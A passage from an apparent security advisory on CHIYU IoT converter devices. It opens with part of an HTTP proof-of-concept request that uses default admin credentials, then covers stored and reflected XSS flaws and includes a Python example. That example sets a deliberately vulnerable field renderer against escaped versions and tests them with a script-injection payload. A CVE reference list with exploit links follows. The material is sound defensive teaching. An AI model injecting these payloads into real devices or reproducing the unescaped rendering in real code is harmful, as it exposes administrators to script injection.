Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: pt-PT,pt;q=0.8,en;q=0.5,en-US;q=0.3
Accept-Encoding: gzip, deflate
Authorization: Basic YWRtaW46YWRtaW4=
Connection: close
Referer: http://127.0.0.1/EmpRcd.htm
Cookie: fresh=
Upgrade-Insecure-Requests: 1

Impact: The attacker stores the payload in the user record itself, so it persists and executes in the browser of every administrator who later views that record.
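The stored XSS cases on this page (CVE-2021-31250, CVE-2021-31643) inject into an HTML attribute of a form field, while CVE-2021-31641 reflects the requested path into the text of the 404 page. The fix in all three is output encoding for the context the value lands in. The following is an added example (not the device firmware; the form template, the field rendering and the tag-listing check are constructed) showing the vulnerable attribute rendering beside the escaped versions, with the standard-library HTML parser used to confirm that the payload no longer produces a tag.

```python
"""Context-aware output encoding for values the CHIYU CGI pages echo back.
Added example, not the device firmware; template and field rendering are
constructed."""
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs, unquote


def parse_cgi_query(query: str) -> dict:
    """Decode a CGI query string as the device forms submit it; a repeated
    parameter keeps its last value (the PoCs send TF_submask and TF_port twice)."""
    return {k: v[-1] for k, v in parse_qs(query, keep_blank_values=True).items()}


def render_field(name: str, value: str) -> str:
    """Vulnerable rendering: the stored value is placed raw inside value="...",
    so a value beginning with "> closes the attribute and the tag."""
    return f'<input name="{name}" value="{value}">'


def render_field_safe(name: str, value: str) -> str:
    """Attribute context: html.escape(quote=True) encodes < > & " and ',
    so the value can neither terminate the attribute nor open a tag."""
    return (f'<input name="{html.escape(name, quote=True)}" '
            f'value="{html.escape(value, quote=True)}">')


def render_404_safe(path: str) -> str:
    """Text context for the 404 page: the requested path is percent-decoded
    (so it reads naturally) and then entity-encoded before it hits the body."""
    return ("<html><body><h1>404 Not Found</h1>"
            f"<p>{html.escape(unquote(path))}</p></body></html>")


class _TagLister(HTMLParser):
    """Records every start tag the parser sees."""
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def tags_in(fragment: str) -> list:
    """Tags a browser-like parser finds in a rendered fragment; a regression
    check that escaping left only the template's own tags."""
    p = _TagLister()
    p.feed(fragment)
    p.close()
    return p.tags


if __name__ == "__main__":
    # Constructed query string carrying the Proof-of-Concept 01 payload for TF_submask.
    q = "TF_ip=443&TF_submask=0&TF_submask=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E&B_apply=APPLY"
    value = parse_cgi_query(q)["TF_submask"]
    print(tags_in(render_field("TF_submask", value)))       # ['input', 'script']
    print(tags_in(render_field_safe("TF_submask", value)))  # ['input']
    print(tags_in(render_404_safe("/%3Cscript%3Ealert(123)%3C/script%3E")))  # ['html', 'body', 'h1', 'p']
```

Escaping on output rather than filtering on input is what makes this robust: the stored value is kept exactly as the user typed it (a hostname containing `&` still works), and every page that displays it goes through the same encoder for its context.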

References

CVE-2021-31249
Title: CRLF injection in CHIYU BF-430, BF-431, and BF-450M TCP/IP Converter devices
Vulnerability: CRLF injection
CVSS: Medium - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
ExploitDB: https://www.exploit-db.com/exploits/49923
Mitigation: The latest version of the CHIYU firmware should be installed to mitigate this vulnerability.

CVE-2021-31250
Title: Multiple stored XSS in CHIYU BF-430, BF-431, and BF-450M IP converter devices
Vulnerability: Stored XSS
CVSS: Medium - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
ExploitDB: https://www.exploit-db.com/exploits/49922
Mitigation: The latest version of the CHIYU firmware should be installed to mitigate this vulnerability.

CVE-2021-31251
Title: Telnet auth bypass in CHIYU IoT devices allowing to obtain administrative privileges
Vulnerability: Authentication bypass
SSV-ID: SSV-99267
CVSS: Critical - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Seebug: https://www.seebug.org/vuldb/ssvid-99267
ExploitDB: https://www.exploit-db.com/exploits/49936
Mitigation: The latest version of the CHIYU firmware should be installed to mitigate this vulnerability. In this new version, the telnet service was disabled in order to solve this issue.

CVE-2021-31252
Title: Open redirect vulnerability in CHIYU IoT devices
Vulnerability: Open Redirect
CVSS: Medium - CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:N/A:N
Mitigation: The latest version of the CHIYU firmware should be installed to mitigate this vulnerability.

CVE-2021-31641
Title: Unauthenticated XSS in several CHIYU IoT devices
Vulnerability: Reflected XSS
CVSS: Medium - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N
ExploitDB: https://www.exploit-db.com/exploits/49922
Mitigation: The latest version of the CHIYU firmware should be installed to mitigate this vulnerability.

CVE-2021-31642
Title: Denial of Service in several CHIYU IoT devices affecting the web-portal
Vulnerability: Integer overflow
CVSS: Medium - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
ExploitDB: https://www.exploit-db.com/exploits/49937
Mitigation: The latest version of the CHIYU firmware should be installed to mitigate this vulnerability.

CVE-2021-31643
Title: Stored XSS in CHIYU SEMAC, BF-630, BF-631, and Webpass IoT devices
Vulnerability: Stored XSS
CVSS: Medium - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
ExploitDB: https://www.exploit-db.com/exploits/49922
Mitigation: The latest version of the CHIYU firmware should be installed to mitigate this vulnerability.

Additional links
nuclei-templates/CVE-2021-31249.yaml (projectdiscovery/nuclei-templates, GitHub)
nuclei-templates/CVE-2021-31250.yaml (projectdiscovery/nuclei-templates, GitHub)
Dancing in the IoT: CHIYU devices vulnerable to remote attacks (Segurança Informática): https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks
Solve CVE-2021-31251 for BF-430/ BF-431/ BF-450M/ SEMAC (CHIYU vendor notice)